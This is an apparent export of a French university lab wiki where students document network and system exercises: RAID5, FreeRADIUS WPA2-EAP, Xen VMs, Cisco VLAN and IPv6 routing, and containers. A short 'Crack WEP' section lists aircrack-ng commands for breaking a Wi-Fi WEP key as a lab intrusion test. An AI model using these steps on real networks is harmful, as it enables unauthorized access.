 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w'&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part1,xvdf1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part2,xvdg1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_part3,xvdh1,w',&lt;br /&gt;
  ]&lt;br /&gt;
&lt;br /&gt;
=====Création du RAID=====&lt;br /&gt;
Création du RAID5 à l'aide de mdadm&lt;br /&gt;
  sudo mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=4 /dev/sdb1 /dev/sdc1 /dev/sdd1 /dev/sde1&lt;br /&gt;
&lt;br /&gt;
Lors du premier essai l'erreur suivante est apparue  &lt;br /&gt;
  mdadm: cannot open /dev/xvdf1: Device or resource busy&lt;br /&gt;
&lt;br /&gt;
Après quelques recherches, j'ai consulté le fichier /proc/mdstat&lt;br /&gt;
  root@Dionysos:~# cat /proc/mdstat&lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md127 : active (auto-read-only) raid5 xvdg1[0] xvdf1[2]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [U_U]&lt;br /&gt;
        &lt;br /&gt;
  unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
J'ai donc arrêté md127 grâce à &lt;br /&gt;
   mdadm --stop /dev/md127&lt;br /&gt;
&lt;br /&gt;
Puis j'ai relancé la commande de création du RAID&lt;br /&gt;
&lt;br /&gt;
En relisant /proc/mdstat, j'ai obtenu &lt;br /&gt;
  Personalities : [linear] [multipath] [raid0] [raid1] [raid6] [raid5] [raid4] [raid10] &lt;br /&gt;
  md0 : active raid5 xvdh1[2] xvdg1[1] xvdf1[0]&lt;br /&gt;
        2093056 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&lt;br /&gt;
Daemonisation du volume RAID, pour que la VM le charge à chaque redémarrage&lt;br /&gt;
  mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
On formate le RAID&lt;br /&gt;
  root@Dionysos:~#mkfs.ext4 /dev/md0&lt;br /&gt;
  mke2fs 1.44.4 (18-Aug-2018)&lt;br /&gt;
  Creating filesystem with 523264 4k blocks and 130816 inodes&lt;br /&gt;
  Filesystem UUID: e7b32d68-7297-4957-9104-574fff233b93&lt;br /&gt;
  Superblock backups stored on blocks: 32768, 98304, 163840, 229376, 294912&lt;br /&gt;
  &lt;br /&gt;
  Allocating group tables: done                            &lt;br /&gt;
  Writing inode tables: done                            &lt;br /&gt;
  Creating journal (8192 blocks): done&lt;br /&gt;
  Writing superblocks and filesystem accounting information: done&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, nous demandons à notre VM de monter le volume à chaque redémarrage&lt;br /&gt;
  /dev/md0        /media/raid     ext4     defaults       0       1&lt;br /&gt;
&lt;br /&gt;
Puis nous créons un dossier&lt;br /&gt;
  mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier, nous créons un simple fichier texte blabla.txt&lt;br /&gt;
&lt;br /&gt;
Comme demandé dans le sujet, j'ai arrêté ma VM. Puis je l'ai relancée, en désactivant une des partitions : xvdh1&lt;br /&gt;
&lt;br /&gt;
Résultat, dans le dossier /media/raid&lt;br /&gt;
  root@Dionysos:/media/raid# ls&lt;br /&gt;
  lost+found&lt;br /&gt;
&lt;br /&gt;
====Sécurisation Wifi par WPA2-EAP====&lt;br /&gt;
&lt;br /&gt;
Installation de freeradius &lt;br /&gt;
  apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/freeradius/3.0/users on ajoute la ligne&lt;br /&gt;
&lt;br /&gt;
  Dionysos Cleartext-Password :=NOTRE_MDP_ROOT&lt;br /&gt;
&lt;br /&gt;
Le serveur doit être configuré en PEAP-MSCHAPv2. Nous devons modifier :&lt;br /&gt;
&lt;br /&gt;
-/etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
-etc/freeradius/3.0/mods-enabled/mschap&lt;br /&gt;
  mschap {&lt;br /&gt;
     ...&lt;br /&gt;
     use_mppe = yes&lt;br /&gt;
     require_encryption = yes&lt;br /&gt;
     require_strong = yes&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
Dans cette même section nous ajoutons la ligne  &lt;br /&gt;
  with_ntdomain_hack = yes&lt;br /&gt;
&lt;br /&gt;
On ajoute les points d'accès dans notre configuration de serveur (fichier : /etc/freeradius/3.0/clients.conf) :&lt;br /&gt;
client 192.168.0.10/32&lt;br /&gt;
{&lt;br /&gt;
  secret = secretIMA5SC&lt;br /&gt;
  shortname = accesDionysos&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
====Crack WEP====&lt;br /&gt;
&lt;br /&gt;
* récuperer l'interface wifi&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
* mettre l'interface en écoute et récupérer le nouveau nom de l'interface (&amp;lt;interface2&amp;gt;)&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer le '''Channel''' et le '''BSSID'''&lt;br /&gt;
&lt;br /&gt;
 airodump &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* récupérer des &amp;lt;code&amp;gt;#Data&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c &amp;lt;CHANNEL&amp;gt; --bssid &amp;lt;BSSID&amp;gt; -w crack_wep &amp;lt;interface2&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer un spam de paquets ARP&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a &amp;lt;BSSID&amp;gt; &amp;lt;interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* lancer le crack&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng crack_wep01.cap&lt;br /&gt;
&lt;br /&gt;
* resultat si assez de #Data&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Jdqb aircrack.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Les étapes ==&lt;br /&gt;
&lt;br /&gt;
=== Introduction ===&lt;br /&gt;
&lt;br /&gt;
=== Installation des systèmes d'exploitation ===&lt;br /&gt;
&lt;br /&gt;
==== Installation dans la machine virtuelle Xen ====&lt;br /&gt;
&lt;br /&gt;
* L'accès se fait par SSH sur le dom0 &amp;lt;code&amp;gt;cordouan.insecserv.deule.net&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Création d'une machine virtuelle Xen Linux sur Cordouan =====&lt;br /&gt;
&lt;br /&gt;
Pour ce faire, il faut utiliser la commande &amp;lt;code&amp;gt;xen-create-image&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre commande : &amp;lt;code&amp;gt;xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;--hostname=&amp;lt;/code&amp;gt; : Le nom de votre machine&lt;br /&gt;
* &amp;lt;code&amp;gt;--ip=&amp;lt;/code&amp;gt; : L'ip routée qui vous a été attribué lors de la réalisation du '''plan d'adressage'''  &lt;br /&gt;
* &amp;lt;code&amp;gt;--netmask=&amp;lt;/code&amp;gt; : Le masque réseau du plan d'adressage&lt;br /&gt;
* &amp;lt;code&amp;gt;--dir=&amp;lt;/code&amp;gt; : l'emplacement des fichiers '''disk.img'''  et '''swap.img'''. Dans le sous répertoire &amp;lt;code&amp;gt;domains/Dionysos&amp;lt;/code&amp;gt; dans notre cas&lt;br /&gt;
&lt;br /&gt;
===== Modification du fichier de configuration de la machine virtuelle =====&lt;br /&gt;
&lt;br /&gt;
On retrouve ensuite le fichier de configuration '''.cfg''' de la VM à l'emplacement &amp;lt;code&amp;gt;/etc/xen&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; nano /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',                  # Partition LVM pour /var&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',                 # Partition LVM pour /home&lt;br /&gt;
 &lt;br /&gt;
      ]&lt;br /&gt;
 [...]&lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.178 ,mac=00:16:3E:6F:61:EE,bridge=IMA5sc' ]       # Ajout du bridge&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
===== Lancement de la machine =====&lt;br /&gt;
&lt;br /&gt;
Toujours en root depuis cordouan&lt;br /&gt;
&lt;br /&gt;
* Lancement : &amp;lt;code&amp;gt;xl create /etc/xen/Dionysos.cfg&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
À l'issue du premier lancement, on récupère un mot de passe root automatiquement généré&lt;br /&gt;
&lt;br /&gt;
* Une fois lancée : &amp;lt;code&amp;gt;xl console Dionysos&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On arrive donc sur la machine, il y a plusieurs modifications à effectuer :&lt;br /&gt;
&lt;br /&gt;
====== Autoriser le login en root sur la machine via SSH ======&lt;br /&gt;
&lt;br /&gt;
Modification du fichier &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; nous décommentons la ligne &amp;lt;code&amp;gt;PermitRootLogin yes&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Modifier le mot de passe root : &amp;lt;code&amp;gt;passwd&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====== Réglage du réseau ======&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/network/interfaces&amp;lt;/code&amp;gt; pour ajouter &amp;lt;code&amp;gt;gateway 193.48.57.190&amp;lt;/code&amp;gt; à l'interface eth0&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
  address 193.48.57.178&lt;br /&gt;
  netmask 255.255.255.240&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
 [...]&lt;br /&gt;
&lt;br /&gt;
On éteint puis allume à nouveau l'interface avec &amp;lt;code&amp;gt;ifdown eth0&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ifup eth0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajout de la route par défaut pour utiliser le routeur virtuel de l'architecture&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;ip route add default via 193.48.57.190 dev eth0 onlink&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
l'IP '''193.48.57.190''' est celle du routeur virtuel. Elle a été définie lors du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
=== Architecture réseau ===&lt;br /&gt;
&lt;br /&gt;
==== L'architecture générale ====&lt;br /&gt;
&lt;br /&gt;
==== Les réseaux virtuels ====&lt;br /&gt;
&lt;br /&gt;
Mise à disposition d'un réseau IPv4 routé : &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; dans le VLAN 110 de l'école&lt;br /&gt;
&lt;br /&gt;
Lors de la réalisation de ce TP, le réseau était déjà découpé en deux partie.&lt;br /&gt;
&lt;br /&gt;
La première pour les IMA2A5 : allant de &amp;lt;code&amp;gt;193.48.57.160/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.175/28&amp;lt;/code&amp;gt;&lt;br /&gt;
La seconde était encore inutilisée : Nous avions donc à disposition les adresses allant de &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;193.48.57.191/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Avec un masque &amp;lt;code&amp;gt;/28&amp;lt;/code&amp;gt; ('''240''') nous avions donc 16 adresses dans le réseau &amp;lt;code&amp;gt;193.48.57.176/28&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons donc établi avec le groupe routeur 2 (Binôme 11) le plan d'adressage suivant&lt;br /&gt;
&lt;br /&gt;
* .176 : adresse de réseau&lt;br /&gt;
* .177 à .187 : les adresses IP des machines virtuelles Xen&lt;br /&gt;
* .188 : adresse du '''Routeur 1'''&lt;br /&gt;
* .189 : adresse du '''Routeur 2'''&lt;br /&gt;
* .190 : adresse du '''Routeur Virtuel'''&lt;br /&gt;
* .191 : adresse de diffusion&lt;br /&gt;
&lt;br /&gt;
Nous avions également à utiliser un réseau IPv4 non routé (&amp;lt;code&amp;gt;10.60.0.0/16&amp;lt;/code&amp;gt;) où chaque binôme devait avoir un sous-réseau.&lt;br /&gt;
&lt;br /&gt;
Les IMA2A5 avaient choisi d'utiliser des réseau de la forme : &amp;lt;code&amp;gt;10.60.N.0/24&amp;lt;/code&amp;gt; où '''N''' est le numéro de binôme, variant de 1 à 5 dans leur cas.&lt;br /&gt;
&lt;br /&gt;
Nous avons repris cette idée en prenant la forme &amp;lt;code&amp;gt;10.60.10+N.0/24&amp;lt;/code&amp;gt; avec pour choix, en vue de la configuration des routeurs :&lt;br /&gt;
&lt;br /&gt;
* Adresse du routeur 1 : 10.60.11.252/24&lt;br /&gt;
* Adresse du routeur 2 : 10.60.11.253/24&lt;br /&gt;
* Adresse du routeur virtuel : 10.60.11.254/24&lt;br /&gt;
&lt;br /&gt;
Rappel du plan d'adressage&lt;br /&gt;
&lt;br /&gt;
* [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA5sc_2018/2019 IMA5sc 2018/19]&lt;br /&gt;
&lt;br /&gt;
==== 3.3 Le routage de sites (IPv4) - Routeur Cisco 3560 ====&lt;br /&gt;
&lt;br /&gt;
Nous nous sommes chargés de la configuration du routeur 1, le Cisco 3560.&lt;br /&gt;
&lt;br /&gt;
Comme nous étions situés sur la Zabeth09, nous avons pu utiliser un câble muni d'un adaptateur pour relier en USB la Zabeth au port console du routeur.&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite utilisé &amp;lt;code&amp;gt;minicom -os&amp;lt;/code&amp;gt; en '''root''' avec les réglages suivants :&lt;br /&gt;
&lt;br /&gt;
* '''/dev/ttyUSB0'''&lt;br /&gt;
* '''9600 8N1'''&lt;br /&gt;
* Hardware Flow Control : '''No'''&lt;br /&gt;
&lt;br /&gt;
On arrive ensuite sur le routeur. '''Switch&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
Rappel des commandes Cisco utiles (ou [https://tvantroys.plil.fr/IMA4/network/ Cours de réseau IMA4]&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;enable&amp;lt;/code&amp;gt; : permet de passer en EXEC privilégié sur le Cisco&lt;br /&gt;
* &amp;lt;code&amp;gt;configure terminal&amp;lt;/code&amp;gt; : peut aussi être remplacé par &amp;lt;code&amp;gt;conf t&amp;lt;/code&amp;gt; pour passer en mode de configuration globale&lt;br /&gt;
* &amp;lt;code&amp;gt;exit&amp;lt;/code&amp;gt; : pour retourner à un niveau prédédent&lt;br /&gt;
* &amp;lt;code&amp;gt;write&amp;lt;/code&amp;gt; : au niveau privilégié de base, permet de sauvegarder la configuration&lt;br /&gt;
* &amp;lt;code&amp;gt;interface NOM_INTERFACE&amp;lt;/code&amp;gt; : pour configurer  une interface (peut aussi s'écrire &amp;lt;code&amp;gt;int NOM_INTERFACE&amp;lt;/code&amp;gt;)&lt;br /&gt;
* &amp;lt;code&amp;gt;?&amp;lt;/code&amp;gt; : pour afficher les commandes possibles au niveau actuel&lt;br /&gt;
&lt;br /&gt;
Dans cette partie on s'intéresse à la configuration des interfaces en IPv4 :&lt;br /&gt;
&lt;br /&gt;
Au niveau de l'architecture, nous voulons que le réseau soit redondant, ainsi il faut que les deux routeurs puissent effectuer le même travail mais pas en même temps.&lt;br /&gt;
&lt;br /&gt;
L'un des deux réalise le travail (il est prioritaire) et l'autre vérifie que le travail est effectué, en cas d'arrêt, il prend le relais.&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, le groupe 11 (routeur 2) a décidé de mettre une priorité basse dans la configuration de leur routeur.&lt;br /&gt;
&lt;br /&gt;
Rappel : Le réseau s'organise sur plusieurs VLANs&lt;br /&gt;
&lt;br /&gt;
* VLAN 1 : Pour les autres composants tels que la borne wifi configurée par le groupe 1.&lt;br /&gt;
* VLAN 43 : Il s'agit du VLAN où sont les machines XEN IMA5. Les IMA2A5 avaient opté pour le VLAN 42.&lt;br /&gt;
* VLAN 131 : Le VLAN d'interconnexion de l'école. (SR52), les IMA2A5 utilisent le VLAN 130.&lt;br /&gt;
* VLAN 11 à 21 : Un VLAN par binôme, c'est dans ces VLAN que nous utiliserons les adresses de la forme '''10.60.10+N.X'''. Comme pour les adresses, nous avons opté pour des numéros de la forme 10+Numéro de groupe.&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 1 =====&lt;br /&gt;
&lt;br /&gt;
Il est juste question d'attribuer au routeur une adresse dans le vlan 1 pour la borne wifi&lt;br /&gt;
&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43 &lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On commence par supprimer l'interface (&amp;lt;code&amp;gt;no int vlan43&amp;lt;/code&amp;gt;) en cas de doute sur sa configuration puis on la recrée et on attribue au routeur une adresse IP (188 = routeur 1) dans le VLAN (190 = routeur virtuel).&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248      &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
* Remplacer &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN et &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérification =====&lt;br /&gt;
&lt;br /&gt;
Pour tester on peut tenter de ping le routeur depuis une source exterieure ou alors utiliser un routeur pour ping l'autre.&lt;br /&gt;
&lt;br /&gt;
* Ping depuis une machine virtuelle vers '''193.48.57.188''' (routeur 1) &lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping dionysos r1.png]]&lt;br /&gt;
&lt;br /&gt;
* Ping depuis le routeur 1 vers '''193.48.57.189''' (routeur 2)&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Ping r1 r2.png]]&lt;br /&gt;
&lt;br /&gt;
==== 3.4 Le routage de site (IPv6) ====&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, nous retournons dans la configuration des interfaces pour ajouter un routage via IPv6.&lt;br /&gt;
&lt;br /&gt;
Dans le sujet il est indiqué que les adresses disponibles se situent à partir de &amp;lt;code&amp;gt;2001:660:4401:60b0::/64&amp;lt;/code&amp;gt; mais les premières adresses étant prises par les IMA2A5 nous utiliserons les adresses en '''C0''' et plus plutôt qu'à partir '''B0'''&lt;br /&gt;
&lt;br /&gt;
* ajouter à la configuration globale &lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 43 =====&lt;br /&gt;
&lt;br /&gt;
En partant du mode privilégié :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
On supprime à nouveau l'interface (mais ce n'est pas nécessaire) pour y imposer la nouvelle configuration de l'interface&lt;br /&gt;
&lt;br /&gt;
===== Configuration du VLAN 131 =====&lt;br /&gt;
&lt;br /&gt;
Même chose et même principe dans le VLAN d'interconnexion :&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Configuration des VLANs 11 à 21 =====&lt;br /&gt;
&lt;br /&gt;
Remplacer &lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt;XX&amp;lt;/code&amp;gt; par le numéro du VLAN &lt;br /&gt;
* &amp;lt;code&amp;gt;N&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;name groupeN&amp;lt;/code&amp;gt; par le numéro du groupe&lt;br /&gt;
* &amp;lt;code&amp;gt;HH&amp;lt;/code&amp;gt; dans la partie IPv6 par '''C1''' à '''CB''' suivant le groupe&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlanXX&lt;br /&gt;
 int vlanXX&lt;br /&gt;
 ip address 10.60.XX.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby XX ip 10.60.XX.254&lt;br /&gt;
 standby XX preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60HH::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60HH::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan XX&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
==== 3.5 Interconnexion avec Internet IPv4 ====&lt;br /&gt;
&lt;br /&gt;
Comme les IMA2A5 utilisent déjà le VLAN130 ('''192.168.222.0/29''') nous utilisons le VLAN131 &amp;lt;code&amp;gt;192.168.222.8/29&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
router ospf 1&lt;br /&gt;
 router-id 10.60.11.252&lt;br /&gt;
 log-adjacency-changes&lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
 redistribute connected subnets&lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
==== 3.6 Interconnexion avec Internet IPv6 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== 3.7 Sécurisation du réseau ====&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de clef WEP d'un point d'accès wifi ====&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
&lt;br /&gt;
=== Réalisation ===&lt;br /&gt;
&lt;br /&gt;
* '''REMARQUE''' Nous n'avons pas eu à nous occuper des points '''6.3''', '''6.4''' et '''6.5''' du sujet&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de données ====&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;/div&gt;</summary>
		<author><name>Jdupont3</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49091</id>
		<title>TP sysres IMA5sc 2018/2019 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2018/2019_G2&amp;diff=49091"/>
				<updated>2018-12-21T15:16:21Z</updated>
		
		<summary type="html">&lt;p&gt;Jdupont3 : /* 3.4 Le routage de site (IPv6) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=TP GIS4 - Conteneur réalisation manuelle=&lt;br /&gt;
==Création des systèmes fichier==&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /home/pifou/Documents/IMA5/JDQB/PRA/   (Zabeth09)&lt;br /&gt;
&lt;br /&gt;
  dd if=/dev/zero of=disk1 bs=1024k count=10240&lt;br /&gt;
&lt;br /&gt;
  mkfs disk1&lt;br /&gt;
&lt;br /&gt;
Dans /tmp création de répertoires pour le stockage &lt;br /&gt;
  &lt;br /&gt;
  mkdir JDQB_DISK1&lt;br /&gt;
  mkdir JDQB_DISK2&lt;br /&gt;
  mkdir JDQB_DISK3&lt;br /&gt;
&lt;br /&gt;
  mount -o loop disk1 /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  debootstrap --include=apache2,nano stable /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
  echo &amp;quot;proc /proc defaults 0 0&amp;quot; &amp;gt;&amp;gt; /tmp/JDQB_DISK1/etc/fstab&lt;br /&gt;
&lt;br /&gt;
  umount -d /tmp/JDQB_DISK1&lt;br /&gt;
&lt;br /&gt;
On clone le disk1 pour avoir disk2 et disk3 (cp)&lt;br /&gt;
&lt;br /&gt;
On remonte les trois disques&lt;br /&gt;
  mount -o loop diskX /tmp/JDQB_DISKX&lt;br /&gt;
&lt;br /&gt;
==Lancement des conteneurs==&lt;br /&gt;
Ouverture de trois terminaux en root, puis utilisation de la commande dans chacun des terminaux&lt;br /&gt;
&lt;br /&gt;
  unshare -n -u -p -f -m chroot /tmp/JDQB_DISKX /bin/sh -c &amp;quot;mount /proc ; /bin/bash&amp;quot; ;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans chaque conteneur &lt;br /&gt;
&lt;br /&gt;
  ip l set eth0 up&lt;br /&gt;
